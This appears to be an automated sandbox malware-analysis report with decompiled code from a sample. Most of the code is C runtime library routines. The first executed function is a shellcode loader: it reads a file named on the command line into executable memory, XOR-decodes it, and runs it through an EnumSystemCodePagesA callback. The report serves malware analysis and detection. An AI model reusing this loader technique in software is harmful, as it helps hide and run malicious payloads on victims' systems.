___removelocaleref 12410->12412 12414 eb435f 12411->12414 12412->12411 12417 eb40ee 12412->12417 12447 eb2233 LeaveCriticalSection 12414->12447 12416 eb4366 12416->12392 12418 eb4167 12417->12418 12419 eb4103 12417->12419 12420 eb41b4 12418->12420 12421 eb2248 _free 58 API calls 12418->12421 12419->12418 12428 eb2248 _free 58 API calls 12419->12428 12431 eb4134 12419->12431 12422 eb8ba7 ___free_lc_time 58 API calls 12420->12422 12425 eb41dd 12420->12425 12423 eb4188 12421->12423 12424 eb41d2 12422->12424 12426 eb2248 _free 58 API calls 12423->12426 12429 eb2248 _free 58 API calls 12424->12429 12430 eb423c 12425->12430 12444 eb2248 58 API calls _free 12425->12444 12432 eb419b 12426->12432 12427 eb2248 _free 58 API calls 12433 eb415c 12427->12433 12434 eb4129 12428->12434 12429->12425 12435 eb2248 _free 58 API calls 12430->12435 12436 eb2248 _free 58 API calls 12431->12436 12446 eb4152 12431->12446 12437 eb2248 _free 58 API calls 12432->12437 12438 eb2248 _free 58 API calls 12433->12438 12439 eb842d ___init_monetary 58 API calls 12434->12439 12440 eb4242 12435->12440 12441 eb4147 12436->12441 12442 eb41a9 12437->12442 12438->12418 12439->12431 12440->12411 12443 eb8902 ___free_lconv_num 58 API calls 12441->12443 12445 eb2248 _free 58 API calls 12442->12445 12443->12446 12444->12425 12445->12420 12446->12427 12447->12416 12451 eb2233 LeaveCriticalSection 12448->12451 12450 eb470e 12450->12408 12451->12450 12453 eaecd6 LeaveCriticalSection 12452->12453 12454 eaecb7 12452->12454 12453->11992 12454->12453 12455 eaecbe 12454->12455 12458 eb2233 LeaveCriticalSection 12455->12458 12457 eaecd3 12457->11992 12458->12457 12460 eae6ae __commit 12459->12460 12461 eae6f1 12460->12461 12462 eae6c4 _memset 12460->12462 12463 eae6e9 __commit 12460->12463 12472 eaec39 12461->12472 12465 eaf100 ___strgtold12_l 58 API calls 12462->12465 12463->11940 12467 eae6de 12465->12467 12469 eaeb1e ___strgtold12_l 9 API calls 12467->12469 12469->12463 12473 eaec6b EnterCriticalSection 12472->12473 12474 eaec49 12472->12474 12476 eae6f7 12473->12476 12474->12473 12475 eaec51 12474->12475 12477 eb20a9 __lock 58 API calls 12475->12477 12478 eae4c2 12476->12478 12477->12476 12479 eae4dd _memset 12478->12479 12491 eae4f8 12478->12491 12480 eae4e8 12479->12480 12486 eae538 12479->12486 12479->12491 12481 eaf100 ___strgtold12_l 58 API calls 12480->12481 12482 eae4ed 12481->12482 12483 eaeb1e ___strgtold12_l 9 API calls 12482->12483 12483->12491 12485 eae649 _memset 12489 eaf100 ___strgtold12_l 58 API calls 12485->12489 12486->12485 12486->12491 12495 eaf693 12486->12495 12502 eaf84a 12486->12502 12568 eaf572 12486->12568 12588 eaf6b7 12486->12588 12489->12482 12492 eae72b 12491->12492 12493 eaeca8 __wfsopen 2 API calls 12492->12493 12494 eae731 12493->12494 12494->12463 12496 eaf69d 12495->12496 12497 eaf6b2 12495->12497 12498 eaf100 ___strgtold12_l 58 API calls 12496->12498 12497->12486 12499 eaf6a2 12498->12499 12500 eaeb1e ___strgtold12_l 9 API calls 12499->12500 12501 eaf6ad 12500->12501 12501->12486 12503 eaf86b 12502->12503 12504 eaf882 12502->12504 12505 eaf0cc __set_osfhnd 58 API calls 12503->12505 12506 eaffba 12504->12506 12511 eaf8bc 12504->12511 12507 eaf870 12505->12507 12508 eaf0cc __set_osfhnd 58 API calls 12506->12508 12509 eaf100 ___strgtold12_l 58 API calls 12507->12509 12510 eaffbf 12508->12510 12548 eaf877 12509->12548 12512 eaf100 ___strgtold12_l 58 API calls 12510->12512 12513 eaf8c4 12511->12513 12517 eaf8db 12511->12517 12514 eaf8d0 12512->12514 12515 eaf0cc __set_osfhnd 58 API calls 12513->12515 12518 eaeb1e ___strgtold12_l 9 API calls 12514->12518 12516 eaf8c9 12515->12516 12520 eaf100 ___strgtold12_l 58 API calls 12516->12520 12517->12516 12519 eaf0cc __set_osfhnd 58 API calls 12517->12519 12521 eaf928 12517->12521 12525 eaf915 12517->12525 12517->12548 12518->12548 12519->12517 12520->12514 12522 eb22c8 __malloc_crt 58 API calls 12521->12522 12523 eaf938 12522->12523 12526 eaf95b 12523->12526 12527 eaf940 12523->12527 12524 eb3924 __stbuf 58 API calls 12528 eafa29 12524->12528 12525->12524 12530 eb3f56 __lseeki64_nolock 60 API calls 12526->12530 12529 eaf100 ___strgtold12_l 58 API calls 12527->12529 12531 eafaa2 ReadFile 12528->12531 12535 eafa3f GetConsoleMode 12528->12535 12534 eaf945 12529->12534 12530->12525 12532 eaff82 GetLastError 12531->12532 12533 eafac4 12531->12533 12539 eaff8f 12532->12539 12540 eafa82 12532->12540 12533->12532 12542 eafa94 12533->12542 12536 eaf0cc __set_osfhnd 58 API calls 12534->12536 12537 eafa9f 12535->12537 12538 eafa53 12535->12538 12536->12548 12537->12531 12538->12537 12543 eafa59 ReadConsoleW 12538->12543 12541 eaf100 ___strgtold12_l 58 API calls 12539->12541 12546 eaf0df __dosmaperr 58 API calls 12540->12546 12552 eafa88 12540->12552 12544 eaff94 12541->12544 12550 eafd66 12542->12550 12551 eafaf9 12542->12551 12542->12552 12543->12542 12545 eafa7c GetLastError 12543->12545 12547 eaf0cc __set_osfhnd 58 API calls 12544->12547 12545->12540 12546->12552 12547->12552 12548->12486 12549 eb2248 _free 58 API calls 12549->12548 12550->12552 12556 eafe6c ReadFile 12550->12556 12554 eafbe6 12551->12554 12555 eafb65 ReadFile 12551->12555 12552->12548 12552->12549 12554->12552 12558 eafca3 12554->12558 12559 eafc93 12554->12559 12562 eafc53 MultiByteToWideChar 12554->12562 12557 eafb86 GetLastError 12555->12557 12566 eafb90 12555->12566 12561 eafe8f GetLastError 12556->12561 12567 eafe9d 12556->12567 12557->12566 12558->12562 12563 eb3f56 __lseeki64_nolock 60 API calls 12558->12563 12560 eaf100 ___strgtold12_l 58 API calls 12559->12560 12560->12552 12561->12567 12562->12545 12562->12552 12563->12562 12564 eb3f56 __lseeki64_nolock 60 API calls 12564->12566 12565 eb3f56 __lseeki64_nolock 60 API calls 12565->12567 12566->12551 12566->12564 12567->12550 12567->12565 12569 eaf57d 12568->12569 12574 eaf592 12568->12574 12570 eaf100 ___strgtold12_l 58 API calls 12569->12570 12571 eaf582 12570->12571 12572 eaeb1e ___strgtold12_l 9 API calls 12571->12572 12580 eaf58d 12572->12580 12573 eaf5c7 12576 eaf693 __fclose_nolock 58 API calls 12573->12576 12574->12573 12574->12580 12635 eb3297 12574->12635 12577 eaf5db 12576->12577 12602 eaf736 12577->12602 12579 eaf5e2 12579->12580 12581 eaf693 __fclose_nolock 58 API calls 12579->12581 12580->12486 12582 eaf605 12581->12582 12582->12580 12583 eaf693 __fclose_nolock 58 API calls 12582->12583 12584 eaf611 12583->12584 12584->12580 12585 eaf693 __fclose_nolock 58 API calls 12584->12585 12586 eaf61e 12585->12586 12587 eaf693 __fclose_nolock 58 API calls 12586->12587 12587->12580 12589 eaf6c6 12588->12589 12598 eaf6c2 _memmove 12588->12598 12590 eaf6cd 12589->12590 12593 eaf6e0 _memset 12589->12593 12591 eaf100 ___strgtold12_l 58 API calls 12590->12591 12592 eaf6d2 12591->12592 12594 eaeb1e ___strgtold12_l 9 API calls 12592->12594 12595 eaf70e 12593->12595 12596 eaf717 12593->12596 12593->12598 12594->12598 12597 eaf100 ___strgtold12_l 58 API calls 12595->12597 12596->12598 12600 eaf100 ___strgtold12_l 58 API calls 12596->12600 12599 eaf713 12597->12599 12598->12486 12601 eaeb1e ___strgtold12_l 9 API calls 12599->12601 12600->12599 12601->12598 12603 eaf742 __commit 12602->12603 12604 eaf74f 12603->12604 12605 eaf766 12603->12605 12607 eaf0cc __set_osfhnd 58 API calls 12604->12607 12606 eaf82a 12605->12606 12608 eaf77a 12605->12608 12609 eaf0cc __set_osfhnd 58 API calls 12606->12609 12610 eaf754 12607->12610 12611 eaf798 12608->12611 12612 eaf7a5 12608->12612 12613 eaf79d 12609->12613 12614 eaf100 ___strgtold12_l 58 API calls 12610->12614 12615 eaf0cc __set_osfhnd 58 API calls 12611->12615 12616 eaf7b2 12612->12616 12617 eaf7c7 12612->12617 12620 eaf100 ___strgtold12_l 58 API calls 12613->12620 12626 eaf75b __commit 12614->12626 12615->12613 12618 eaf0cc __set_osfhnd 58 API calls 12616->12618 12619 eb3978 ___lock_fhandle 59 API calls 12617->12619 12622 eaf7b7 12618->12622 12623 eaf7cd 12619->12623 12621 eaf7bf 12620->12621 12629 eaeb1e ___strgtold12_l 9 API calls 12621->12629 12627 eaf100 ___strgtold12_l 58 API calls 12622->12627 12624 eaf7f3 12623->12624 12625 eaf7e0 12623->12625 12630 eaf100 ___strgtold12_l 58 API calls 12624->12630 12628 eaf84a __read_nolock 70 API calls 12625->12628 12626->12579 12627->12621 12631 eaf7ec 12628->12631 12629->12626 12632 eaf7f8 12630->12632 12638 eaf822 12631->12638 12633 eaf0cc __set_osfhnd 58 API calls 12632->12633 12633->12631 12636 eb22c8 __malloc_crt 58 API calls 12635->12636 12637 eb32ac 12636->12637 12637->12573 12641 eb3e34 LeaveCriticalSection 12638->12641 12640 eaf828 12640->12626 12641->12640 14964 eb055f 14965 eb056c 14964->14965 14966 eb0592 14964->14966 14967 eb057a 14965->14967 14968 eb18d0 __getptd_noexit TlsGetValue 14965->14968 14969 eb18ef __getptd_noexit TlsSetValue 14967->14969 14968->14967 14970 eb058a 14969->14970 14972 eb042a 14970->14972 14974 eb0436 __commit 14972->14974 14973 eb044f 14976 eb045e 14973->14976 14978 eb2248 _free 58 API calls 14973->14978 14974->14973 14975 eb2248 _free 58 API calls 14974->14975 14977 eb053e __commit 14974->14977 14975->14973 14979 eb046d 14976->14979 14981 eb2248 _free 58 API calls 14976->14981 14977->14966 14978->14976 14980 eb047c 14979->14980 14982 eb2248 _free 58 API calls 14979->14982 14983 eb2248 _free 58 API calls 14980->14983 14984 eb048b 14980->14984 14981->14979 14982->14980 14983->14984 14985 eb2248 _free 58 API calls 14984->14985 14987 eb049a 14984->14987 14985->14987 14986 eb04a9 14988 eb04bb 14986->14988 14990 eb2248 _free 58 API calls 14986->14990 14987->14986 14989 eb2248 _free 58 API calls 14987->14989 14991 eb20a9 __lock 58 API calls 14988->14991 14989->14986 14990->14988 14994 eb04c3 14991->14994 14992 eb04e6 15004 eb054a 14992->15004 14994->14992 14996 eb2248 _free 58 API calls 14994->14996 14996->14992 14997 eb20a9 __lock 58 API calls 15002 eb04fa ___removelocaleref 14997->15002 14998 eb052b 15007 eb0556 14998->15007 15001 eb2248 _free 58 API calls 15001->14977 15002->14998 15003 eb40ee ___freetlocinfo 58 API calls 15002->15003 15003->14998 15010 eb2233 LeaveCriticalSection 15004->15010 15006 eb04f3 15006->14997 15011 eb2233 LeaveCriticalSection 15007->15011 15009 eb0538 15009->15001 15010->15006 15011->15009 14212 eb021c 14213 eb0251 14212->14213 14214 eb022c 14212->14214 14214->14213 14219 eb4001 14214->14219 14221 eb400d __commit 14219->14221 14221->14219 14222 eb0595 58 API calls ___get_qualified_locale_downlevel 14221->14222 14223 eb83ea 14221->14223 14222->14221 14234 eb4ea0 DecodePointer 14223->14234 14225 eb83ef 14226 eb83fa 14225->14226 14235 eb4f77 14225->14235 14228 eb8422 14226->14228 14229 eb8404 IsProcessorFeaturePresent 14226->14229 14231 eb0ade _abort 58 API calls 14228->14231 14230 eb840f 14229->14230 14232 eae9b4 _abort 7 API calls 14230->14232 14233 eb842c 14231->14233 14232->14228 14234->14225 14238 eb4f83 __commit 14235->14238 14236 eb4fed 14237 eb4fca DecodePointer 14236->14237 14243 eb4ffc 14236->14243 14242 eb4fb9 _siglookup 14237->14242 14238->14236 14238->14237 14239 eb4fb4 14238->14239 14245 eb4fb0 14238->14245 14241 eb05ad __getptd_noexit 58 API calls 14239->14241 14241->14242 14246 eb505a 14242->14246 14248 eb0ade _abort 58 API calls 14242->14248 14255 eb4fc2 __commit 14242->14255 14244 eaf100 ___strgtold12_l 58 API calls 14243->14244 14247 eb5001 14244->14247 14245->14239 14245->14243 14250 eb20a9 __lock 58 API calls 14246->14250 14253 eb5065 14246->14253 14249 eaeb1e ___strgtold12_l 9 API calls 14247->14249 14248->14246 14249->14255 14250->14253 14251 eb50c7 EncodePointer 14252 eb509a 14251->14252 14256 eb50f8 14252->14256 14253->14251 14253->14252 14255->14226 14257 eb50fc 14256->14257 14258 eb5103 14256->14258 14260 eb2233 LeaveCriticalSection 14257->14260 14258->14255 14260->14258

                Executed Functions

                Function 00EA1000 Relevance: 10.6, APIs: 7, Instructions: 95memoryCOMMON
                Download Yara Rule

                Control-flow Graph

                C-Code - Quality: 91%
                			E00EA1000(void* __edx) {
				int _v8;
				void* _t8;
				void* _t9;
				_Unknown_base(*)()* _t12;
				signed int _t17;
				signed int _t20;
				signed int _t23;
				void* _t25;
				signed int _t36;
				signed int _t37;
				signed int _t39;
				void* _t44;
				void* _t45;
				_Unknown_base(*)()* _t52;
				void* _t54;

				_t44 = __edx;
				_t54 = 0;
				_t8 = E00EAE383((CommandLineToArgvW(GetCommandLineW(),  &_v8))[1], 0xece000); // executed
				_t25 = _t8;
				_t9 = VirtualAlloc(0, 0x1ad27480, 0x3000, 4); // executed
				if(_t9 == 0) {
					return 0;
				} else {
					E00EAE740(_t9, 0x99, 0x1ad27480);
					_t12 = VirtualAlloc(0, 0x12cb, 0x3000, 0x40); // executed
					_t52 = _t12;
					E00EAE687(_t52, 0x12cb, 1, _t25); // executed
					do {
						 *(_t52 + _t54) =  *(_t52 + _t54) - 0x0000005b ^ 0x000000f3;
						_t54 = _t54 + 1;
					} while (_t54 < 0x12cb);
					_t17 = EnumSystemCodePagesA(_t52, 0); // executed
					if(_t17 == 0xe12f) {
						_t45 = _t44 + 0xdb0e;
						_pop(_t36);
						_t37 =  !_t36;
						if(( !_t17 ^ 0x0000cd45) != 0x6082) {
							_t37 = 0xbc6b;
							_t45 = _t45 - 1;
						}
						_pop(_t20);
						_t23 = (_t20 & 0x000161dd) - 0xfffffffffffec5f9;
						_t39 =  !(_t37 - 0xb1b2);
						if(_t23 != 0xb7d3) {
							_t23 = _t23 & 0x00010f24;
							_t39 = _t39 + 0x158ad;
						}
						return _t23;
					} else {
						return _t17;
					}
				}
			}


















                0x00ea1000
                0x00ea100a
                0x00ea1022
                0x00ea102d
                0x00ea103e
                0x00ea1042
                0x00eae28a
                0x00ea1048
                0x00ea1053
                0x00ea1068
                0x00ea1072
                0x00ea1076
                0x00ea107e
                0x00ea1085
                0x00ea1088
                0x00ea1089
                0x00ea1090
                0x00ea109b
                0x00ea10bb
                0x00ea10c1
                0x00ea10c2
                0x00ea10ce
                0x00ea10d1
                0x00ea10d6
                0x00ea10d6
                0x00ea10d7
                0x00ea10de
                0x00ea10e9
                0x00ea10f6
                0x00ea10f9
                0x00ea1104
                0x00ea110a
                0x00ea111a
                0x00ea109d
                0x00ea10ab
                0x00ea10ab
                0x00ea109b

                APIs
                • GetCommandLineW.KERNEL32(?), ref: 00EA100D
                • CommandLineToArgvW.SHELL32(00000000), ref: 00EA1014
                  • Part of subcall function 00EAE383: __wfsopen.LIBCMT ref: 00EAE38E
                • VirtualAlloc.KERNELBASE(00000000,1AD27480,00003000,00000004), ref: 00EA103E
                • _memset.LIBCMT ref: 00EA1053
                • VirtualAlloc.KERNELBASE(00000000,000012CB,00003000,00000040), ref: 00EA1068
                • __fread_nolock.LIBCMT ref: 00EA1076
                • EnumSystemCodePagesA.KERNEL32(00000000,00000000), ref: 00EA1090
                Memory Dump Source
                • Source File: 00000001.00000002.448099573.0000000000EA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00EA0000, based on PE: true
                • Associated: 00000001.00000002.448093197.0000000000EA0000.00000002.00000001.01000000.00000004.sdmpDownload File
                • Associated: 00000001.00000002.448197888.0000000000EC7000.00000002.00000001.01000000.00000004.sdmpDownload File
                • Associated: 00000001.00000002.448222329.0000000000ECE000.00000004.00000001.01000000.00000004.sdmpDownload File
                • Associated: 00000001.00000002.448230622.0000000000ED2000.00000002.00000001.01000000.00000004.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_ea0000_zrztlh.jbxd
                Similarity
                • API ID: AllocCommandLineVirtual$ArgvCodeEnumPagesSystem__fread_nolock__wfsopen_memset
                • String ID:
                • API String ID: 888471934-0
                • Opcode ID: da2a978dd0c744818f37d4d29d81790f40597e8ae17b832ad39eb6b5387bb87c
                • Instruction ID: d83b026c8da85a0b4bed6c30537d25b35a15405bc33636079891f410aac8a0ed
                • Opcode Fuzzy Hash: da2a978dd0c744818f37d4d29d81790f40597e8ae17b832ad39eb6b5387bb87c
                • Instruction Fuzzy Hash: BD2167775546003BF3241275EC8BFEB2A59D785308F090539F741FA1C1DAADB98242A8
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00EA6B5A Relevance: 9.0, APIs: 6, Instructions: 47COMMON
                Download Yara Rule

                Control-flow Graph

                C-Code - Quality: 87%
                			E00EA6B5A(void* __edx, void* __esi, void* __eflags) {
				void* _t8;
				void* _t9;
				void* _t10;

				_t9 = __esi;
				_t8 = __edx;
				asm("loopne 0xffffff8b");
				if(__eflags != 0) {
					E00EB0A4B();
				} else {
					if( *((intOrPtr*)(_t10 - 0x1c)) == 0) {
						E00EB0ADE(__esi);
					}
					E00EB0A3C(_t8);
				}
				 *((intOrPtr*)(_t10 - 4)) = 0xfffffffe;
				return E00EAF225(_t9);
			}






                0x00ea6b5a
                0x00ea6b5a
                0x00eae8fc
                0x00eae8fe
                0x00eae8dc
                0x00eae900
                0x00eae904
                0x00eae907
                0x00eae907
                0x00eae90c
                0x00eae90c
                0x00eae911
                0x00eae91f

                APIs
                Memory Dump Source
                • Source File: 00000001.00000002.448099573.0000000000EA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00EA0000, based on PE: true
                • Associated: 00000001.00000002.448093197.0000000000EA0000.00000002.00000001.01000000.00000004.sdmpDownload File
                • Associated: 00000001.00000002.448197888.0000000000EC7000.00000002.00000001.01000000.00000004.sdmpDownload File
                • Associated: 00000001.00000002.448222329.0000000000ECE000.00000004.00000001.01000000.00000004.sdmpDownload File
                • Associated: 00000001.00000002.448230622.0000000000ED2000.00000002.00000001.01000000.00000004.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_ea0000_zrztlh.jbxd
                Similarity
                • API ID: __amsg_exit$__cinit__wsetenvp__wwincmdln_doexit
                • String ID:
                • API String ID: 2587630013-0
                • Opcode ID: 344c1ff1ac66235cbc6626bc53989c47ba6ee416d5cb28026ab77ac35ced7a00
                • Instruction ID: d097b58567ac583a1fbb4bc13346af363cfbc39e784798e3def6faa5e6ee9351
                • Opcode Fuzzy Hash: 344c1ff1ac66235cbc6626bc53989c47ba6ee416d5cb28026ab77ac35ced7a00
                • Instruction Fuzzy Hash: EEF0C230A0031268DA2877B15C03BEF25C45F1B365F1438A5F805FE2C3DE58FA414266
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00EAE4C2 Relevance: 7.7, APIs: 5, Instructions: 163COMMONLIBRARYCODE
                Download Yara Rule

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 54 eae4c2-eae4db 55 eae4f8 54->55 56 eae4dd-eae4e2 54->56 58 eae4fa-eae500 55->58 56->55 57 eae4e4-eae4e6 56->57 59 eae4e8-eae4ed call eaf100 57->59 60 eae501-eae506 57->60 71 eae4f3 call eaeb1e 59->71 62 eae508-eae512 60->62 63 eae514-eae518 60->63 62->63 65 eae538-eae547 62->65 66 eae51a-eae525 call eae740 63->66 67 eae528-eae52a 63->67 69 eae549-eae54c 65->69 70 eae54e 65->70 66->67 67->59 68 eae52c-eae536 67->68 68->59 68->65 73 eae553-eae558 69->73 70->73 71->55 76 eae55e-eae565 73->76 77 eae641-eae644 73->77 78 eae5a6-eae5a8 76->78 79 eae567-eae56f 76->79 77->58 81 eae5aa-eae5ac 78->81 82 eae612-eae613 call eaf572 78->82 79->78 80 eae571 79->80 86 eae66f 80->86 87 eae577-eae579 80->87 83 eae5ae-eae5b6 81->83 84 eae5d0-eae5db 81->84 90 eae618-eae61c 82->90 88 eae5b8-eae5c4 83->88 89 eae5c6-eae5ca 83->89 91 eae5df-eae5e2 84->91 92 eae5dd 84->92 95 eae673-eae67c 86->95 93 eae57b-eae57d 87->93 94 eae580-eae585 87->94 96 eae5cc-eae5ce 88->96 89->96 90->95 97 eae61e-eae623 90->97 98 eae649-eae64d 91->98 99 eae5e4-eae5f0 call eaf693 call eaf84a 91->99 92->91 93->94 94->98 100 eae58b-eae5a4 call eaf6b7 94->100 95->58 96->91 97->98 101 eae625-eae636 97->101 102 eae65f-eae66a call eaf100 98->102 103 eae64f-eae65c call eae740 98->103 115 eae5f5-eae5fa 99->115 114 eae607-eae610 100->114 106 eae639-eae63b 101->106 102->71 103->102 106->76 106->77 114->106 116 eae600-eae603 115->116 117 eae681-eae685 115->117 116->86 118 eae605 116->118 117->95 118->114
                C-Code - Quality: 71%
                			E00EAE4C2(char* _a4, signed int _a8, signed int _a12, signed int _a16, signed int _a20) {
				char* _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				void* __ebx;
				void* __esi;
				signed int _t74;
				signed int _t78;
				char _t81;
				signed int _t86;
				signed int _t88;
				signed int _t91;
				signed int _t94;
				signed int _t97;
				signed int _t98;
				char* _t99;
				signed int _t100;
				signed int _t102;
				signed int _t103;
				signed int _t104;
				char* _t110;
				signed int _t113;
				signed int _t117;
				signed int _t119;
				void* _t120;

				_t99 = _a4;
				_t74 = _a8;
				_v8 = _t99;
				_v12 = _t74;
				if(_a12 == 0) {
					L5:
					return 0;
				}
				_t97 = _a16;
				if(_t97 == 0) {
					goto L5;
				}
				if(_t99 != 0) {
					_t119 = _a20;
					__eflags = _t119;
					if(_t119 == 0) {
						L9:
						__eflags = _a8 - 0xffffffff;
						if(_a8 != 0xffffffff) {
							_t74 = E00EAE740(_t99, 0, _a8);
							_t120 = _t120 + 0xc;
						}
						__eflags = _t119;
						if(_t119 == 0) {
							goto L3;
						} else {
							_t78 = _t74 | 0xffffffff;
							__eflags = _t97 - _t78 / _a12;
							if(_t97 > _t78 / _a12) {
								goto L3;
							}
							L13:
							_t117 = _a12 * _t97;
							__eflags =  *(_t119 + 0xc) & 0x0000010c;
							_t98 = _t117;
							if(( *(_t119 + 0xc) & 0x0000010c) == 0) {
								_t100 = 0x1000;
							} else {
								_t100 =  *(_t119 + 0x18);
							}
							_v16 = _t100;
							__eflags = _t117;
							if(_t117 == 0) {
								L41:
								return _a16;
							} else {
								do {
									__eflags =  *(_t119 + 0xc) & 0x0000010c;
									if(( *(_t119 + 0xc) & 0x0000010c) == 0) {
										L24:
										__eflags = _t98 - _t100;
										if(_t98 < _t100) {
											_t81 = E00EAF572(_t98, _t100, _t119, _t119); // executed
											__eflags = _t81 - 0xffffffff;
											if(_t81 == 0xffffffff) {
												L46:
												return (_t117 - _t98) / _a12;
											}
											_t102 = _v12;
											__eflags = _t102;
											if(_t102 == 0) {
												L42:
												__eflags = _a8 - 0xffffffff;
												if(_a8 != 0xffffffff) {
													E00EAE740(_a4, 0, _a8);
												}
												 *((intOrPtr*)(E00EAF100())) = 0x22;
												L4:
												E00EAEB1E();
												goto L5;
											}
											_t110 = _v8;
											 *_t110 = _t81;
											_t98 = _t98 - 1;
											_v8 = _t110 + 1;
											_t103 = _t102 - 1;
											__eflags = _t103;
											_v12 = _t103;
											_t100 =  *(_t119 + 0x18);
											_v16 = _t100;
											goto L40;
										}
										__eflags = _t100;
										if(_t100 == 0) {
											_t86 = 0x7fffffff;
											__eflags = _t98 - 0x7fffffff;
											if(_t98 <= 0x7fffffff) {
												_t86 = _t98;
											}
										} else {
											__eflags = _t98 - 0x7fffffff;
											if(_t98 <= 0x7fffffff) {
												_t44 = _t98 % _t100;
												__eflags = _t44;
												_t113 = _t44;
												_t91 = _t98;
											} else {
												_t113 = 0x7fffffff % _t100;
												_t91 = 0x7fffffff;
											}
											_t86 = _t91 - _t113;
										}
										__eflags = _t86 - _v12;
										if(_t86 > _v12) {
											goto L42;
										} else {
											_push(_t86);
											_push(_v8);
											_push(E00EAF693(_t119)); // executed
											_t88 = E00EAF84A(); // executed
											_t120 = _t120 + 0xc;
											__eflags = _t88;
											if(_t88 == 0) {
												 *(_t119 + 0xc) =  *(_t119 + 0xc) | 0x00000010;
												goto L46;
											}
											__eflags = _t88 - 0xffffffff;
											if(_t88 == 0xffffffff) {
												L45:
												_t64 = _t119 + 0xc;
												 *_t64 =  *(_t119 + 0xc) | 0x00000020;
												__eflags =  *_t64;
												goto L46;
											}
											_t98 = _t98 - _t88;
											__eflags = _t98;
											L36:
											_v8 = _v8 + _t88;
											_v12 = _v12 - _t88;
											_t100 = _v16;
											goto L40;
										}
									}
									_t94 =  *(_t119 + 4);
									_v20 = _t94;
									__eflags = _t94;
									if(__eflags == 0) {
										goto L24;
									}
									if(__eflags < 0) {
										goto L45;
									}
									__eflags = _t98 - _t94;
									if(_t98 < _t94) {
										_t94 = _t98;
										_v20 = _t98;
									}
									_t104 = _v12;
									__eflags = _t94 - _t104;
									if(_t94 > _t104) {
										goto L42;
									} else {
										E00EAF6B7(_v8, _t104,  *_t119, _t94);
										_t88 = _v20;
										_t120 = _t120 + 0x10;
										 *(_t119 + 4) =  *(_t119 + 4) - _t88;
										_t98 = _t98 - _t88;
										 *_t119 =  *_t119 + _t88;
										goto L36;
									}
									L40:
									__eflags = _t98;
								} while (_t98 != 0);
								goto L41;
							}
						}
					}
					_t74 = (_t74 | 0xffffffff) / _a12;
					__eflags = _t97 - _t74;
					if(_t97 <= _t74) {
						goto L13;
					}
					goto L9;
				}
				L3:
				 *((intOrPtr*)(E00EAF100())) = 0x16;
				goto L4;
			}




























                0x00eae4cc
                0x00eae4cf
                0x00eae4d5
                0x00eae4d8
                0x00eae4db
                0x00eae4f8
                0x00000000
                0x00eae4f8
                0x00eae4dd
                0x00eae4e2
                0x00000000
                0x00000000
                0x00eae4e6
                0x00eae501
                0x00eae504
                0x00eae506
                0x00eae514
                0x00eae514
                0x00eae518
                0x00eae520
                0x00eae525
                0x00eae525
                0x00eae528
                0x00eae52a
                0x00000000
                0x00eae52c
                0x00eae52c
                0x00eae534
                0x00eae536
                0x00000000
                0x00000000
                0x00eae538
                0x00eae53b
                0x00eae53e
                0x00eae545
                0x00eae547
                0x00eae54e
                0x00eae549
                0x00eae549
                0x00eae549
                0x00eae553
                0x00eae556
                0x00eae558
                0x00eae641
                0x00000000
                0x00eae55e
                0x00eae55e
                0x00eae55e
                0x00eae565
                0x00eae5a6
                0x00eae5a6
                0x00eae5a8
                0x00eae613
                0x00eae619
                0x00eae61c
                0x00eae673
                0x00000000
                0x00eae679
                0x00eae61e
                0x00eae621
                0x00eae623
                0x00eae649
                0x00eae649
                0x00eae64d
                0x00eae657
                0x00eae65c
                0x00eae664
                0x00eae4f3
                0x00eae4f3
                0x00000000
                0x00eae4f3
                0x00eae625
                0x00eae628
                0x00eae62b
                0x00eae62c
                0x00eae62f
                0x00eae62f
                0x00eae630
                0x00eae633
                0x00eae636
                0x00000000
                0x00eae636
                0x00eae5aa
                0x00eae5ac
                0x00eae5d0
                0x00eae5d5
                0x00eae5db
                0x00eae5dd
                0x00eae5dd
                0x00eae5ae
                0x00eae5b0
                0x00eae5b6
                0x00eae5c8
                0x00eae5c8
                0x00eae5c8
                0x00eae5ca
                0x00eae5b8
                0x00eae5bd
                0x00eae5bf
                0x00eae5bf
                0x00eae5cc
                0x00eae5cc
                0x00eae5df
                0x00eae5e2
                0x00000000
                0x00eae5e4
                0x00eae5e4
                0x00eae5e5
                0x00eae5ef
                0x00eae5f0
                0x00eae5f5
                0x00eae5f8
                0x00eae5fa
                0x00eae681
                0x00000000
                0x00eae681
                0x00eae600
                0x00eae603
                0x00eae66f
                0x00eae66f
                0x00eae66f
                0x00eae66f
                0x00000000
                0x00eae66f
                0x00eae605
                0x00eae605
                0x00eae607
                0x00eae607
                0x00eae60a
                0x00eae60d
                0x00000000
                0x00eae60d
                0x00eae5e2
                0x00eae567
                0x00eae56a
                0x00eae56d
                0x00eae56f
                0x00000000
                0x00000000
                0x00eae571
                0x00000000
                0x00000000
                0x00eae577
                0x00eae579
                0x00eae57b
                0x00eae57d
                0x00eae57d
                0x00eae580
                0x00eae583
                0x00eae585
                0x00000000
                0x00eae58b
                0x00eae592
                0x00eae597
                0x00eae59a
                0x00eae59d
                0x00eae5a0
                0x00eae5a2
                0x00000000
                0x00eae5a2
                0x00eae639
                0x00eae639
                0x00eae639
                0x00000000
                0x00eae55e
                0x00eae558
                0x00eae52a
                0x00eae50d
                0x00eae510
                0x00eae512
                0x00000000
                0x00000000
                0x00000000
                0x00eae512
                0x00eae4e8
                0x00eae4ed
                0x00000000

                APIs
                Memory Dump Source
                • Source File: 00000001.00000002.448099573.0000000000EA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00EA0000, based on PE: true
                • Associated: 00000001.00000002.448093197.0000000000EA0000.00000002.00000001.01000000.00000004.sdmpDownload File
                • Associated: 00000001.00000002.448197888.0000000000EC7000.00000002.00000001.01000000.00000004.sdmpDownload File
                • Associated: 00000001.00000002.448222329.0000000000ECE000.00000004.00000001.01000000.00000004.sdmpDownload File
                • Associated: 00000001.00000002.448230622.0000000000ED2000.00000002.00000001.01000000.00000004.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_ea0000_zrztlh.jbxd
                Similarity
                • API ID: _memset$__filbuf__getptd_noexit__read_nolock_memcpy_s
                • String ID:
                • API String ID: 1559183368-0
